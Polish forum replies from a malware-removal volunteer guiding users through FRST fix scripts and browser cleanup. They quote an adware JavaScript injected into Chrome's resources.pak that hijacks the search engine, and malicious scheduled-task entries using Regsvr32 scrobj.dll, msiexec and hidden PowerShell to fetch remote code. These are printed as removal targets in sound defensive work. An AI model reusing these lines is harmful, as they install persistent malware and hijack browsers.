picasso

Dzięki za pliki. Wszystko jasne. To nie nowy trik, tylko tu użyty w nowym kontekście (blokada wyszukiwarki). Adware zmodyfikowało globalny plik zasobów C:\Program files (x86)\Google\Chrome\Application\[wersja]\resources.pak wstawiając skrypt ustawiający "domyślną wyszukiwarkę" w sposób permanentny: //Yrrehs is here var default_search_engine_name = 'mystarting123',default_search_engine_keywords = 'mystarting123',url = 'http://www.mystarting123.com/search/index.php?z=2edce67d80ffd74f08dc489gbz5tfw3qfw9g8o4z2q&q=%s';var index = (this.defaultsList_.dataModel.length + this.othersList_.dataModel.length - 1);var alreay_exists = false;for (var i = 0; i < this.defaultsList_.dataModel.length; ++i) {if (this.defaultsList_.dataModel.array_[i].name === default_search_engine_name) {index = i;alreay_exists = true;break;}}for (var i = 0; i < this.othersList_.dataModel.length && !alreay_exists; ++i) {if (this.othersList_.dataModel.array_[i].name === default_search_engine_name) {index = i + this.defaultsList_.dataModel.length;alreay_exists = true;break;}}if (alreay_exists) {chrome.send('managerSetDefaultSearchEngine', [index]);} else {chrome.send('editSearchEngine', [String(-1)]);chrome.send('searchEngineEditCompleted', [default_search_engine_name, default_search_engine_keywords, url]);chrome.send('managerSetDefaultSearchEngine', [index]);}}, }; . Ta modyfikacja jest niewykrywalna przez FRST i nie będzie. Już dawno temu zgłaszałam adware modyfikujące resources.pak i niestety nie było możliwe dodać detekcję. By to wyleczyć, albo szuka się poprzedniej poprawnej kopii pliku (np. via Shadow Explorer), albo reinstaluje przeglądarkę (tu już zrobione). Czyli nic więcej nie trzeba tu robić pod tym kątem, a ja wszystko już wiem.

Niestety wykonałeś nie te instrukcje co należy, czyli usunięte przeze mnie (napisane przez Miszel). Powodem usunięcia było ominięcie kupy szkodliwych usług. Przywróciłam post, bo teraz nie ma sensu temat. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: S2 DirectX11b; C:\ProgramData\DirectX11b\System.exe [8192 2016-02-17] () [brak podpisu cyfrowego] R2 Framework; C:\ProgramData\WindowsSQL\System.exe [8192 2016-02-17] () [brak podpisu cyfrowego] S2 MinerGate; C:\ProgramData\Framework\System.exe [8192 2016-02-17] () [brak podpisu cyfrowego] C:\ProgramData\Framework C:\ProgramData\DirectX11b C:\ProgramData\MicrosoftCOM C:\ProgramData\WindowsSQL Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Dostarcz wynikowy fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut.

Sterownik SWDUMon został pomyślnie usunięty za pomocą skryptu FRST, ale został przywrócony. Przyjrzałam się bliżej raportom co go przywraca. Ten sterownik należy do: AVG Driver Updater (x32 Version: 2.2.2 - AVG Netherlands B.V) Hidden Task: {7BA60D47-7384-4A38-8418-E8F039EA4AAF} - System32\Tasks\AVG Driver Updater Scan => C:\Program Files (x86)\AVG Driver Updater\AVG Driver Updater.exe [2016-08-10] (AVG Netherlands B.V) AVG Driver Updater to rebrand programu Slimware Driver Updater, co wyjaśnia wspólny sterownik. Pytaniem jest czy ten program jest sprawny i uruchamia się, oraz czy w interfejsie AVG widać jakieś opcje jego deinstalacji. Nie da się go po prostu odinstalować przez Panel sterowania (program ukryty) bez dodatkowych operacji.

W innym temacie wykryłam, że modyfikacja siedzi w globalnym pliku resources.pak. Konieczna reinstalacja Google Chrome. Przy deinstalacji zaznacz opcję Usuń także dane przeglądarki, by pozbyć się też zdefektowanego profilu.

Kopiowanie danych spod RE niestety jest mozolne, albo komendy w cmd albo trik z otworzeniem Notatnika i posłużenienie się mini eksploratorem w dialogu otwierania plików ustawionym na "Wszystkie pliki" (ale ukrytych plików ten eksplorator nie widzi).

Następnym razem proszę nie podejmuj się akcji spoza zadanej puli działań, bo występują utrudnienia. Niestety odinstalowałeś Google Chrome uniemożliwiając mi diagnozę usterki w Chrome. Reinstalacja Chrome zostałaby podana pewnie potem (i jestem przekonana, że po niej wyszukiwarka nie wraca). Ale nie o to tu mi chodziło. Informacja gdzie konkretnie siedzi ta blokada jest mi potrzebna, bo może uda się to dodać do detekcji narzędzi. Są punkty Przywracania systemu, czyli kopie poprzednich katalogów Google powinno się dać wyłuskać do analizy. Uruchom ShadowExplorer, wybierz datę odpowiadającą temu punktowi gdy Chrome jeszcze było w systemie: 21-06-2017 08:42:16 Restore Point Created by FRST Przekopiuj poniższe foldery na Pulpit: C:\Program Files (x86)\Google C:\Users\user\AppData\Local\Google C:\Users\user\AppData\Roaming\Google Spakuj do ZIP, shostuj gdzieś i podaj link.

Na wszelki wypadek wykonaj jeszcze skan SFC: KLIK. I nie widzę możliwości manewru: w raporcie FRST brak konkretów, punkty Przywracania systemu niedostępne, użycie kopii RegBack nie pomogło. Klaruje się reinstalacja systemu.

Po pierwsze, strona Google domyślnie działa już tylko w systemie https a nie http. To co jest tu nie w porządku to fakt, że wklepując te adresy bez prefiksu https nie zostajesz automatycznie przekierowany przez przeglądarkę na wariant z https tylko dostajesz błąd otwierania http (co jest spodziewane). Ten problem w teorii się rozwiązuje poprzez rekonfigurację niektórych preferencji Firefoxa, ale: Masz starą wersję przeglądarki: Mozilla Firefox 45.0.1 (x86 pl) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 pl)) (Version: 45.0.1 - Mozilla) Najnowsza to Firefox 54. Zacznij od instalacji najnowszej wersji.

Jeśli na pewno te katalogi są puste, to dostarcz więcej danych do analizy. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: Folder: C:\Windows\PolicyDefinitions Zip: C:\Program Files (x86)\Google;C:\Users\user\AppData\Local\Google Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Na Pulpicie powstał też plik data_czas.zip. Shostuj go gdzieś i podaj link do paczki.

Może to właśnie coś nie tak z tym plikiem w oryginalnej lokalizacji, stąd problem z rozruchem? Sprawdź czy da radę wykonać kopiowanie ręcznie: Restart komputera i wejdź do opcji RE. Nie uruchamiaj FRST, gdyż on montuje tymczasowo pliki rejestru i nastąpi konflikt w "użyciu". W Wierszu polecenia RE upewnij się za pomocą komendy notepad jakie jest mapowanie dysku z Windows. Następnie wklep poniższą komendę, pod X podstawiając stosowną literę: copy /y X:\Windows\System32\config\RegBack\SYSTEM X:\Windows\System32\config\SYSTEM

Wszystko zrobione. Kończymy: Zastosuj DelFix, a następnie wyczyść foldery Przywracania systemu: KLIK.

Wyniki z obu narzędzi zostaną usunięte hurtem przy udziale jednego skryptu FRST. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\iSafeKrnlBoot DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f DeleteKey: HKLM\SOFTWARE\WOW6432Node\Elex-tech DeleteKey: HKLM\SOFTWARE\WOW6432Node\ScreenShot DeleteKey: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 DeleteKey: HKLM\SOFTWARE\WOW6432Node\Mozilla DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\csastats DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\ICSW1.23 DeleteKey: HKCU\Software\One System Care DeleteKey: HKCU\Software\PRODUCTSETUP DeleteKey: HKCU\SOFTWARE\Classes\https DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ac1f1114_0 DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\b1b34855_0 DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{BDC6D552-7F73-4130-B342-1DB676DE23E0} DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Bagsarah\Application\chrome.exe DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Bagsarah RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Elex-tech RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\SSMgre RemoveDirectory: C:\Windows\system32\log StartBatch: del /q C:\Windows\system32\drivers\iSafeKrnlBoot.sys del /q C:\Windows\system32\drivers\iSafeNetFilter.sys EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. I proszę potwierdź, że w Chrome na liście wyszukiwarek adware już nie figuruje.

Spróbuj użyć inną kopię zapasową, czyli RegBack: 1. Przygotuj w Notatniku plik fixlist.txt o zawartości: LastRegBack: 2017-06-19 19:11 Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik umieść w tym samym folderze skąd uruchamiasz FRST. Uruchom FRST i klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Jeśli Windows się uruchomi, zrób cały zestaw raportów FRST. Niektóre elementy co dopiero usunięte za pomocą skryptu FRST oraz prawdopodobnie kupa śmieci z gałęzi SOFTWARE + SYSTEM usuniętych AdwCleaner wróci.

Niepożądane wątki o ComboFix wycięte. Ani to program do rozwiązywania takich spraw, ani nie jest obsługiwany na Windows 10 (i dobrze). Problem generują zadania Microsoft Office: Task: {08B2180A-FC07-4193-B8AA-97D703CAB39C} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-31] () Task: {38F6B75A-5444-403C-BDA6-817D1BE2A7B6} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-31] () Więcej informacji tutaj: KLIK. Klawisz z flagą Windows + R > taskschd.msc > rozwiń gałąź Office i wyłącz oba zadania. PS. A w spoilerze wątek poboczny, tzn. usuwanie pustych wpisów głównie po aktualizacji z Windows 7 do Windows 10 oraz kilku pustych skrótów.

Tak sądziłam. Pozostaje więc użycie punktu Przywracania systemu sprzed usterki (starsze niż 19 czerwca). FRST wylicza następujące punkty: ==================== Punkty Przywracania systemu ========================= Data punktu przywracania: 2017-06-07 20:10 Data punktu przywracania: 2017-06-11 20:04 Data punktu przywracania: 2017-06-19 18:10 Data punktu przywracania: 2017-06-19 18:17 Data punktu przywracania: 2017-06-19 18:19 Data punktu przywracania: 2017-06-19 18:28 Data punktu przywracania: 2017-06-20 11:35 Zrób Przywracanie systemu z poziomu RE. Jeśli Windows ożyje, zrób logi FRST spod Windows.

Miszel03 prowadzi temat, więc wtrącam się tutaj pod innym kątem: Jeżeli z menu ustawiłeś Google jako domyślną, a wyszukiwarka adware nadal wraca i się ustawia samoczynnie jako domyślna, to być może jest tu jakaś niewidoczna na poziomie FRST blokada. Ostatnio to notowalne zachowanie w kilku tematach, pomimo że teoretycznie polityki Google nie zostały wykryte. Na wszelki wypadek proszę skopiuj na Pulpit następujące foldery (o ile są): C:\Windows\System32\GroupPolicy C:\Windows\System32\GroupPolicyUsers C:\Windows\SysWOW64\GroupPolicy C:\Windows\SysWOW64\GroupPolicyUsers Spakuj do ZIP, shostuj gdzieś i podaj link do paczki.

Cóż, z raportu FRST nic nie wynika w kontekście problemu. Owszem, widać nadal usługi adware (i to rzekomo usuwane przez AdwCleaner), ale podobne występują w innych tematach i nie był zgłaszany taki problem - zresztą etap z logo Windows to faza ładowania sterowników, a tu nie ma nic istotnego w logu.... Poza tym, niestety raport z RE jest ograniczony, tzn. nie listuje zadań Harmonogramu. Nie pozostaje nic innego jak usunąć to co widać, by się upewnić czy to (nie)jest przyczyną. 1. Przygotuj w Notatniku plik fixlist.txt o zawartości: S2 0085711497891849mcinstcleanup; C:\Users\Tomek\AppData\Local\Temp\008571~1.EXE [883024 2017-05-26] (McAfee, Inc.) <==== UWAGA S2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-31] (TODO: <公司名>) <==== UWAGA S2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [92672 2017-05-19] () <==== UWAGA S2 terana; C:\Users\Tomek\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) <==== UWAGA S2 WinSAPSvc; C:\Users\Tomek\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-05-31] () <==== UWAGA S3 aswbdisk; Brak ImagePath S4 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] HKLM-x32\...\Run: [] => [X] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe GroupPolicy-x32: Ograniczenia - Chrome <======= UWAGA DeleteKey: HKLM\SOFTWARE\WOW6432Node\Baglook DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox C:\Program Files\Malwarebytes C:\Program Files\MK C:\Program Files (x86)\Baglook C:\Program Files (x86)\Firefox C:\Program Files (x86)\McAfee C:\Program Files (x86)\MIO C:\ProgramData\AVAST Software C:\ProgramData\BIT C:\ProgramData\MailUpdate C:\ProgramData\Malwarebytes C:\ProgramData\McAfee C:\Users\Tomek\AppData\Local\background_fault C:\Users\Tomek\AppData\Local\Baglook C:\Users\Tomek\AppData\Local\Firefox C:\Users\Tomek\AppData\Local\terana C:\Users\Tomek\AppData\Local\Temp C:\Users\Tomek\AppData\Roaming\Firefox C:\Users\Tomek\AppData\Roaming\MailUpdate C:\Users\Tomek\AppData\Roaming\Picexa Viewer C:\Users\Tomek\AppData\Roaming\Temp C:\Users\Tomek\AppData\Roaming\WinSAPSvc C:\Users\Tomek\AppData\Roaming\WinZipper C:\Windows\System32\log C:\Windows\System32\Tasks\Milimili Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik umieść w tym samym folderze skąd uruchamiasz FRST. Uruchom FRST i klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Sprawdź czy jest możliwe zalogowanie do Windows. Jeśli tak, zrób cały zestaw raportów FRST.

Nie widzę żadnych zmian. Usuń adresy adware ręcznie z Google Chrome: Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń wszystkie adresy > przestaw na "Otwórz stronę nowej karty" I czy przekierowania nadal mają miejsce?

1. Nadal widzę przekierowania luckysearch123.com w Google Chrome. Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres luckysearch123.com, przestaw na "Otwórz stronę nowej karty" Ustawienia > karta Ustawienia > Wygląd i kliknij w napis "Pokaż przycisk strony startowej" > przełącz na opcję "Niestandardową" i usuń adres luckysearch123.com, następnie przełącz z powrotem na "Nową kartę". I czy na pewno ta wyszukiwarka nie figuruje na liście wyboru szukajek? 2. Uruchom FRST, w polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy SearchReg.txt. Bagsarah;Firefox 3. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Fixlog pokazuje, że wszystko przetworzone, ale nowe skany FRST są niepoprawne: uszkodzony nieomal pusty plik FRST.txt + stary plik Addition.txt z wczoraj sprzed usuwania. Usunęłam te dwa załączniki. Zrób nowe skany FRST i doczep do posta powyżej. Pliku Fixlog rzecz jasna nie ruszaj.

Temat przenoszę do działu malware - w systemie grasuje infekcja (ostatnio ładowana przez wynalazki typu KMSpico), poza tym inne ślady modyfikacji adware (np. fałszywe przeglądarki). Operacje do przeprowadzenia: 1. Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj lewy program YAC(Yet Another Cleaner!) oraz fałszywy WorldOfTanks. Nie pomyl programów, tylko pierwsze wejście jest poprawne od gry: World of Tanks (HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net) WorldofTanks (HKLM-x32\...\WorldofTanks) (Version: - ) 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-24] () R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego] S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X] S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] S1 iSafeKrnlKit; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [X] S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] Task: {0D7F4DB9-573C-4080-AF4A-79B3D6AAB75D} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {10A81261-90F5-46B2-9684-6D8778E04859} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {D48645EB-CC21-43F7-8FDE-9A023E2D224A} - System32\Tasks\Windows_Antimalware_System_Host => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [2017-06-12] (® Microsoft Corporation. All rights reserved.) Task: {E39F1B69-B55E-4D0E-954C-D79A1A0D5386} - System32\Tasks\Windows_Antimalware_Host => powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\u3bO8YL0WR.ps1 Task: C:\Windows\Tasks\One System Care Task.job => C:\PROGRA~2\ONESYS~1\SystemConsole.exe Task: C:\Windows\Tasks\One System CarePeriod.job => HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Process] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Processor] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== /q HKLM-x32\...\Run: [] => [X] IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) HKLM\...\StartupApproved\Run32: => "Start_BusinessEverywhere_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_SMSNotifier_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_Update_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "World of Tanks" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount" DeleteKey: HKCU\Software\Bagsarah DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\WOW6432Node\Bagsarah DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files\KMSpico C:\Program Files (x86)\Bagsarah C:\Program Files (x86)\BiaoJi C:\Program Files (x86)\Elex-tech C:\Program Files (x86)\Firefox C:\Program Files (x86)\ProxyGate C:\ProgramData\u3bO8YL0WR.ps1 C:\ProgramData\5f5e51cb-5c01-0 C:\ProgramData\5f5e51cb-4bd3-1 C:\ProgramData\MicrosoftCorporation C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDirStat C:\Users\Barteczek\AppData\Local\Bagsarah C:\Users\Barteczek\AppData\Local\Firefox C:\Users\Barteczek\AppData\Local\minergate-cli C:\Users\Barteczek\AppData\Local\Mozilla C:\Users\Barteczek\AppData\LocalLow\Mozilla C:\Users\Barteczek\AppData\Roaming\BrowserModule C:\Users\Barteczek\AppData\Roaming\Firefox C:\Users\Barteczek\AppData\Roaming\Mozilla C:\Users\Barteczek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks C:\Users\Barteczek\Downloads\torrentex0.1.4b.exe C:\Users\Public\Documents\chrome C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\SysWOW64\00 C:\Windows\SysWOW64\11 C:\Windows\SysWOW64\1111 C:\Windows\SysWOW64\1111111 C:\Windows\SysWOW64\33 C:\Windows\SysWOW64\3333333 C:\Windows\SysWOW64\55 C:\Windows\SysWOW64\GZ CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zostały usunięte wszystkie skróty fałszywych przeglądarek. Odtwórz w wybranych miejscach skróty do prawdziwego Google Chrome. Uruchom przeglądarkę i wyczyść ją z adware: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj adware Tables. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwarka > z rozwijanego menu ustaw jako domyślną Google > klik w Zarządzaj wyszukiwarkami i skasuj z listy wszystkie inne pozycje. Ustaw też przeglądarkę jako domyślną 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Wszystko pomyśnie usunięte. Na koniec zastosuj DelFix.

"Rootkit" wykryty przez GMER to sterowniki tymczasowe Windows Defender relatywne do aktualizacji bazy danych. Wyniki do zignorowania. Poprzednie zadania wykonane pomyślnie, ale rzeczywiście LanmaMaster wrócił w czasie między logami FRST a AdwCleaner. Poprawki: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: R1 LanmaMaster; C:\WINDOWS\system32\drivers\lanmamaster.sys [2957416 2016-11-11] () [brak podpisu cyfrowego] C:\ProgramData\WinCacheData C:\Users\Public\Documents\XMUpdate C:\WINDOWS\system32\lanmamasterHelp.dll C:\WINDOWS\system32\drivers\lanmamaster.sys Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Wejdź w Tryb awaryjny Windows. Uruchom FRST i kliknij Napraw (Fix). Nastąpi restart, opuść tryb awaryjny. Powstanie kolejny fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Miałeś tylko dostarczyć logi z AdwCleaner sprzed pojawienia się na forum (czyli z wczoraj lub wcześniej), a nie uruchamiać program przed i po naprawie FRST. Kolizja ze skryptem FRST i zaciemnianie wyników. Obecnie trzymaj się tylko operacji z FRST, gdy będę potrzebować odczyt z AdwCleaner, poproszę o niego. FRST nie był w stanie ubić sterownika UefGdstor (w ogóle nie wykrywany przez AdwCleaner). Natomiast LanmaMaster nie jest obecny w dostarczonym raporcie FRST, ale pokazuje go nowszy log z AdwCleaner (czyli sterownik mógł wrócić). Ja się jednak trzymam odczytu z FRST a nie AdwCleaner, najwyżej podam potem kolejną poprawkę. Kolejne podejście: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: U2 mptpmdxm; C:\Windows\SysWow64\mptpmdxm.dll [460072 2017-06-14] () R2 UefGdstor; C:\WINDOWS\system32\drivers\UefGdstor.sys [192552 2016-11-11] () C:\ProgramData\Cache C:\WINDOWS\system32\drivers\UefGdstor.sys C:\WINDOWS\SysWOW64\mptpmdxm.dll Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Wejdź w Tryb awaryjny Windows *. Uruchom FRST i kliknij Napraw (Fix). Nastąpi restart, opuść tryb awaryjny. Powstanie kolejny fixlog.txt. * Tryb awaryjny Windows 10: przycisk Start > Ustawienia > Aktualizacja i zabezpieczenia > Odzyskiwanie > Uruchamianie zaawansowane > Uruchom teraz > system zrestartuje i pojawi się ekan z opcjami > Ustawienia zaawansowane > Ustawienia uruchamiania > Tryb awaryjny. 2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut, oraz GMER. Dołącz też plik fixlog.txt.

To Tesla w wersji 2. Obecnie sporo dekoderów do tego wariantu: KLIK.